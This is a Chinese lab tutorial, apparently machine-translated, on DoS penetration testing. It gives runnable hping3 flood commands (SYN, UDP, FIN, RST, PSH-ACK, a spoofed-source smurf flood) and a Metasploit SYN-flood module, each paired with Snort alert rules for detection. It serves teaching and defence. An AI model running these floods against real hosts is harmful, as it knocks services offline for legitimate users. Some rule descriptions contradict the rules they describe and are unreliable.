DOS 攻击渗透测试（第 1 部分）

大家好！今天我们将介绍DOS/DDOS攻击，这里我们将介绍什么是dos攻击；如何对任何目标网络发动 Dos 攻击，其结果是什么，以及受害者如何预测其网络遭受 Dos 攻击。

此内容仅供学习和参考，请勿非法用途！

【要求]:

攻击机： Kali Linux

受害机器： Ubuntu

可选： Wireshark（我们在教程中添加了它，以便我们可以清楚地确认网络所有传入和传出的数据包）

什么是 DOS/DDOS 攻击

来自维基百科

拒绝服务攻击 （DoS 攻击）是一种网络攻击，攻击者试图通过暂时或无限期地干扰连接到 Internet 的主机的服务，使其故意用户无法使用机器或网络资源。拒绝服务通常是通过向目标计算机或资源发送过多的请求来实现的，试图使系统超载并阻止部分或全部合法请求得到满足。

在分布式拒绝服务攻击 （DDoS 攻击）中，淹没受害者的传入流量来自许多不同的来源。DoS 或 DDoS 攻击类似于一群人挤在商店或企业的入口处或大门，不让合法方进入商店或企业，从而扰乱正常运营。

基本上，攻击者机器要么自己在目标机器上发送无限的请求数据包，而不等待来自目标网络的回复数据包，要么使用僵尸程序（主机）在目标机器上发送请求数据包。让我们使用下图进行更多研究，在这里您可以观察到三个阶段，攻击者 机器放置在顶部，而中间部分持有由攻击者机器控制的主机，在底部，您可以看到目标机器。

从下图中可以看出，攻击者机器希望在机器人的帮助下向目标机器发送 ICMP 回显请求数据包，因此这将增加攻击者的数量和目标网络上的请求数据包的数量，并导致流量洪流。此时，目标网络会过载，从而导致某些服务瘫痪，然后阻止部分或所有合法请求得到满足。

DOS/DDOS 类别

• 基于流量的攻击：攻击的目标是通过每秒发送 ICMP、UDP 或 TCP 流量来淹没目标网络的带宽。

• 基于协议的攻击：此类攻击通过每秒发送 TCP SYN 洪水、Ping of Death 或分段数据包攻击等数据包来集中实际目标服务器资源，以摧毁目标并使其无法响应其他合法请求。

• 应用层攻击：攻击者不会尝试摧毁整个服务器，而是通过每秒发送请求来将攻击重点放在正在运行的应用程序上，例如，通过对apache进行无限请求来攻击WordPress、Joomla Web服务器，使其对其他合法请求无响应。

如何进行DOS攻击？

如果您了解 OSI 7 层模型，那么您可能知道，每当我们向服务器发送请求数据包以访问任何特定服务（例如，浏览 Google.com）时，该过程都会通过 OSI 模型的 7 层执行，并在最后我们就可以在浏览器上访问Google.com了。

现在假设目标网络 (192.168.1.107) 中打开了端口 80，用于访问其 HTTP 服务，以便您可以通过浏览器打开其网站并获取这些网页中的可用信息。因此，基本上攻击者计划减慢另一个想要通过端口 80 与目标计算机交互的用户的 HTTP 服务，因为结果服务器将无法回复其他合法请求，这将被视为协议 Dos 攻击。

攻击者可以使用任何工具进行 DOS 攻击，但我们使用 Hping3 进行攻击，为目标网络产生流量洪流，从而减慢其他用户的 HTTP 服务速度。

hping3 -F --flood -p 80 192.168.1.107

上述命令将每秒在目标网络的端口 80 上发送无尽的请求数据包。

Dos攻击会产生什么影响？

正如我们所描述的，任何类型的 Dos 攻击都会影响服务器为其用户和客户端建立连接的服务。这里，当我们在目标网络的端口 80 上发送无限请求数据包时，它应该使合法用户无法使用 HTTP 服务。

因此，现在如果我将在您的浏览器上探索目标 IP 以作为合法用户访问其网站，那么您可以观察到浏览器无法与 HTTP 服务的服务器连接，如下图所示。

如何预测网络中的 DOS 攻击？

在您的网络中配置 IDS，它将监视网络上的传入网络流量并向系统管理员生成可疑流量警报。我们已经在系统（ubuntu：192.168.1.107）上安装了 Snort 作为 NIDS（网络入侵检测系统），请阅读我们之前与 Snort 安装（手动 或使用 apt-respiratory）相关文章及其 规则配置 ，以将其启用为 IDS你的网络。

TCP SYN 洪水

在 ubuntu 终端中执行以下命令，在文本编辑器中打开 snort 本地规则文件。

sudo gedit /etc/snort/rules/local.rules

alert tcp any any -> 192.168.1.107 any ( msg:"SYN Flood Dos"; flags:S; sid:1000006; )

上述规则将通过生成“SYN Flood Dos”警报来监视 192.168.1.107 上传入的 TCP-SYN 数据包。现在通过在终端中执行以下命令来打开 Snort 的 IDS 模式：

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

现在通过使用攻击者的机器发送无限 SYN 数据包来测试上述规则。打开终端并输入Metasploit 框架的msfconsole并执行以下命令来运行 syn 洪水利用。

此漏洞将在目标网络上发送无数 syn 数据包以破坏其服务。

useauxiliary/dos/tcp/synflood msfauxiliary(synflood)> set rhost 192.168.1.107(目标IP) msfauxiliary(synflood)>setshost 192.168.1.105(攻击者IP) msfauxiliary(synflood)>exploit

我们仅在教程中为攻击者的 IP 设置了 shost，否则它是可选的，或者您可以寻址网络的任何随机 IP，现在可以看到 SYN 洪水默认情况下已在端口 80 上启动，它被视为基于协议的 Dos 攻击，如上所述。

正如我上面所说的，为什么我们在本教程中使用 Wireshark，以便您可以清楚地看到从攻击者网络发送到目标网络的数据包。因此，在下图中，您可以注意到目标网络的端口 80 上已发送无尽的 SYN 数据包。

回到你的目标机器，你会注意到snort以完全相同的方式捕获所有传入流量，在这里你会发现它正在生成“SYN Flood Dos”警报。因此，您可以阻止攻击者的 IP (192.168.1.105)，以保护您的网络不丢弃所有进一步传入您网络的数据包。

UDP洪水

现在再次打开本地规则文件以生成 UDP 洪水 Dos 攻击警报，并输入下面给出的规则并保存文件。

alert udp any any -> 192.168.1.107 any (msg: "UDP Flood Dos"; sid:1000001; )

上述规则将通过生成“UDP Flood Dos”警报来监视 192.168.1.107 上传入的 UDP 数据包。现在通过在终端中执行以下命令来打开 Snort 的 IDS 模式：

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

我们使用 Hping3 进行攻击，为目标网络生成流量洪流，从而减慢其他用户的 UDP 服务速度，这被视为如上所述的基于流量的 Dos 攻击。

hping3 --udp --flood -p 80 192.168.1.107

上述命令将在目标网络的端口 80 上每秒发送无限位数据包。

从下图中您可以观察到 Wireshark 捕获了从 192.168.1.105 到 192.168.1.107 的 UDP 数据包。

返回到 Snort 捕获所有传入流量的目标计算机，您将观察到它正在生成 UDP Flood Dos 攻击的警报。因此，您可以阻止攻击者的 IP，以保护您的网络免遭进一步扫描。

SYN FIN 洪水

默认情况下，snort 捕获 SYN FIN Flood 数据包使用以下命令打开 IDS 模式。

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

我们再次使用 Hping3 进行攻击，为目标网络产生流量洪流，从而减慢其他用户的网络服务速度。

hping3 -SF --flood -p 80 192.168.1.107

上述命令将在目标网络的端口 80 上每秒发送无限位数据包。

因此，在下图中，您可以注意到端口 80 上有无数 SYN-FIN 数据包从 192.168.1.105 发送到 192.168.1.107。

回到你的目标机器，你会注意到 snort 以完全相同的方式捕获所有传入流量，在这里你会发现它正在生成“SYN-FIN Flood Dos”警报。因此，您可以阻止攻击者的 IP (192.168.1.105)，以保护您的网络不丢弃所有进一步传入您网络的数据包。

PUSH ACK 洪水

现在再次打开本地规则文件，为某些标志组合（例如 PSH-ACK 数据包）生成警报，并输入下面给出的规则并保存文件。

alert tcp any any -> 192.168.1.107 any (msg: "PUSH-ACK Flood Dos"; sid:1000001; flags:PA; )

上述规则将通过生成“PUSH-ACK Flood Dos”警报来监视 192.168.1.107 上传入的 TCP-PSH/ACK 数据包。现在通过在终端中执行以下命令来打开 Snort 的 IDS 模式：

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

我们再次使用 Hping3 进行攻击，为目标网络产生流量洪流，从而减慢其他用户的网络服务速度。

hping3 -PA --flood -p 80 192.168.1.107

上述命令将在目标网络的端口 80 上每秒发送无限位数据包。

因此，在下图中，您可以注意到端口 80 上有无数的 PSH-ACK 数据包从 192.168.1.105 发送到 192.168.1.107。

回到你的目标机器，你会注意到snort以完全相同的方式捕获所有传入流量，在这里你会发现它正在生成“PUSH-ACK Flood Dos”警报。因此，您可以阻止攻击者的 IP (192.168.1.105)，以保护您的网络不丢弃所有进一步传入您网络的数据包。

重置洪水

现在再次打开本地规则文件以生成重置标志数据包的警报，并输入下面给出的规则并保存文件。

alert tcp any any -> 192.168.1.107 any (msg: "Reset Dos"; sid:1000001; flags:R; )

上述规则将通过生成“Reset Dos”警报来监视 192.168.1.107 上传入的 TCP-RST 数据包。现在通过在终端中执行以下命令来打开 Snort 的 IDS 模式：

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

我们再次使用 Hping3 进行攻击，为目标网络产生流量洪流，从而减慢其他用户的网络服务速度。

hping3 -R --flood -p 80 192.168.1.107

上述命令将在目标网络的端口 80 上每秒发送无限位数据包。

因此，在下图中，您可以注意到端口 80 上有无数的 RST（重置）数据包从 192.168.1.105 发送到 192.168.1.107。

回到你的目标机器，你会注意到snort以完全相同的方式捕获所有传入流量，在这里你会发现它正在生成“ Reset Dos”警报。因此，您可以阻止攻击者的 IP (192.168.1.105)，以保护您的网络不丢弃所有进一步传入您网络的数据包。

FIN 洪水

现在再次打开本地规则文件以生成 Fin 标志数据包的警报，并输入下面给出的规则并保存文件。

alert tcp any any -> 192.168.1.107 any (msg: "FIN Dos"; sid:1000001; flags:F; )

上述规则将通过生成“FIN Dos”警报来监视 192.168.1.107 上传入的 TCP-RST 数据包。现在通过在终端中执行以下命令来打开 Snort 的 IDS 模式：

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

我们再次使用 Hping3 进行攻击，为目标网络产生流量洪流，从而减慢其他用户的网络服务速度。

hping3 -F –flood -p 80 192.168.1.107

上述命令将在目标网络的端口 80 上每秒发送无限位数据包。

因此，在下图中，您可以注意到端口 80 上有无数 FIN（完成）数据包从 192.168.1.105 发送到 192.168.1.107。

回到你的目标机器，你会注意到snort以完全相同的方式捕获所有传入流量，在这里你会发现它正在生成“FIN Dos”警报。因此，您可以阻止攻击者的 IP (192.168.1.105)，以保护您的网络不丢弃所有进一步传入您网络的数据包。

蓝精灵攻击

smurf 攻击是一种 DDOS 攻击，其中使用大量 Internet 控制消息协议数据包来生成虚假 Echo 请求（ICMP 类型：8），其中包含欺骗的源 IP（实际上是目标网络地址）。然后，该请求数据包被传输到网络上的所有网络主机，然后每个主机向欺骗的源地址（目标 IP）发送 ICMP 响应。目标计算机将被流量淹没；这可能会减慢目标计算机的速度并使其可供其他用户使用。

现在再次打开本地规则文件以生成 ICMP 数据包警报，并输入下面给出的规则并保存文件。

alert icmp any any -> any any (msg: "Smurf Dos Attack"; sid:1000003;itype:8; )

上述规则将监控 192.168.1.103 上的 ICMP 数据包，生成“Smurf Dos Attack”警报。现在通过在终端中执行以下命令来打开 Snort 的 IDS 模式：

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

我们再次使用 Hping3 进行攻击，为目标网络生成流量 ICMP 洪水，从而减慢其他用户的网络服务速度。

hping3 --icmp --flood -c 1000 --spoof 192.168.1.103 192.168.1.255

上面的命令将生成虚假的 ICMP 回显请求数据包，其中包含欺骗源 IP：192.168.1.103，这基本上是我们受害者的网络，然后该请求数据包被传输到 192.168.1.255 上的主机网络，然后该主机向欺骗的网络发送 ICMP 响应受害者机器处于 IDS 模式的源地址。

从下面给出的图像中，您可以观察到它显示源计算机 192.168.1.103 向 192.168.1.255 发送 icmp echo 请求数据包，但正如我们所知，实际攻击者是此场景背后的罪魁祸首。

回到你的目标机器，你会注意到snort正在捕获从192.168.1.103到192.168.1.255的所有流量，并生成“Smurf Dos Attack”警报，这意味着我们的机器（受害者的机器）正在ping另一台主机该网络的。因此，网络管理员应该关注此类流量，并且必须检查其网络数据包的系统活动和合法 ICMP 请求。

以上内容仅供学习和参考，请勿非法用途！

从surface 中 选择* ，其中Dark

夜晚，是最孤独的，也许，就这样吧！

原文始发于微信公众号（深网知识库）：DOS 攻击渗透测试（第 1 部分）